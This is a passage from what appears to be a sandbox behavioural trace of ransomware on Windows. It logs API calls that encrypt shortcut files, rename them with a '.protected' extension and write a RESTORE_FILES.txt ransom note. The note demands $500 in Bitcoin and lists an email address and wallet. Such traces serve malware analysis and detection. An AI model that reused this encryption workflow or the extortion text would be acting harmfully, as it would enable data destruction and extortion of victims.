HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.protected") returned 141 [0090.065] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk.protected")) returned 1 [0090.066] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.066] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="Windows") returned 1 [0090.066] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="Program Files") returned 1 [0090.066] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="Program Files (x86)") returned 1 [0090.066] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="$Recycle.bin") returned 1 [0090.066] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="System Volume Information") returned 1 [0090.066] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk") returned 139 [0090.067] StrStrIW (lpFirst="Windows Media Player (2).lnk", lpSrch=".protected") returned 0x0 [0090.067] lstrcmpW (lpString1="Windows Media Player (2).lnk", lpString2="RESTORE_FILES.txt") returned 1 [0090.067] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.067] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.067] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk") returned 139 [0090.067] StrStrW (lpFirst="Windows Media Player (2).lnk", lpSrch=".txt") returned 0x0 [0090.067] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk") returned 139 [0090.067] StrStrW (lpFirst="Windows Media Player (2).lnk", lpSrch=".rar") returned 0x0 [0090.067] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk") returned 139 [0090.067] StrStrW (lpFirst="Windows Media Player (2).lnk", lpSrch=".zip") returned 0x0 [0090.067] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x60b, lpOverlapped=0x0) returned 1 [0090.068] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff9f5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.068] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x60b, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x60b, lpOverlapped=0x0) returned 1 [0090.068] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.068] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.068] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.069] CloseHandle (hObject=0x158) returned 1 [0090.069] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk.protected") returned 149 [0090.069] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk.protected")) returned 1 [0090.070] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.070] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="Windows") returned 1 [0090.070] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="Program Files") returned 1 [0090.070] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="Program Files (x86)") returned 1 [0090.070] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="$Recycle.bin") returned 1 [0090.070] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="System Volume Information") returned 1 [0090.070] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk") returned 135 [0090.070] StrStrIW (lpFirst="Windows Media Player.lnk", lpSrch=".protected") returned 0x0 [0090.070] lstrcmpW (lpString1="Windows Media Player.lnk", lpString2="RESTORE_FILES.txt") returned 1 [0090.070] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.070] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk") returned 135 [0090.071] StrStrW (lpFirst="Windows Media Player.lnk", lpSrch=".txt") returned 0x0 [0090.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk") returned 135 [0090.071] StrStrW (lpFirst="Windows Media Player.lnk", lpSrch=".rar") returned 0x0 [0090.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk") returned 135 [0090.071] StrStrW (lpFirst="Windows Media Player.lnk", lpSrch=".zip") returned 0x0 [0090.071] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x60b, lpOverlapped=0x0) returned 1 [0090.077] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff9f5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.077] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x60b, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x60b, lpOverlapped=0x0) returned 1 [0090.077] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.077] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.077] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.077] CloseHandle (hObject=0x158) returned 1 [0090.077] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.protected") returned 145 [0090.077] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk.protected")) returned 1 [0090.078] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0090.078] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0090.078] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\RESTORE_FILES.txt") returned 128 [0090.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.079] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.079] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0090.080] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.080] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.080] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.080] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0090.080] CloseHandle (hObject=0x154) returned 1 [0090.080] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0090.080] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0090.080] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\RESTORE_FILES.txt") returned 120 [0090.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.081] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.081] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0090.082] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.082] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0090.082] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.082] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0090.082] CloseHandle (hObject=0x150) returned 1 [0090.082] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.082] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="Windows") returned -1 [0090.082] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="Program Files") returned 1 [0090.082] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="Program Files (x86)") returned 1 [0090.082] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="$Recycle.bin") returned 1 [0090.082] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="System Volume Information") returned 1 [0090.082] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 110 [0090.082] StrStrIW (lpFirst="Window Switcher.lnk", lpSrch=".protected") returned 0x0 [0090.082] lstrcmpW (lpString1="Window Switcher.lnk", lpString2="RESTORE_FILES.txt") returned 1 [0090.082] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.082] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.082] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.083] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 110 [0090.083] StrStrW (lpFirst="Window Switcher.lnk", lpSrch=".txt") returned 0x0 [0090.083] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 110 [0090.083] StrStrW (lpFirst="Window Switcher.lnk", lpSrch=".rar") returned 0x0 [0090.083] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 110 [0090.083] StrStrW (lpFirst="Window Switcher.lnk", lpSrch=".zip") returned 0x0 [0090.083] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x110, lpOverlapped=0x0) returned 1 [0090.084] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffef0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.084] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x110, lpOverlapped=0x0) returned 1 [0090.084] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.084] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.084] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.084] CloseHandle (hObject=0x150) returned 1 [0090.084] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.protected") returned 120 [0090.084] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk.protected")) returned 1 [0090.085] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0090.085] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0090.085] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\RESTORE_FILES.txt") returned 108 [0090.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.086] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your 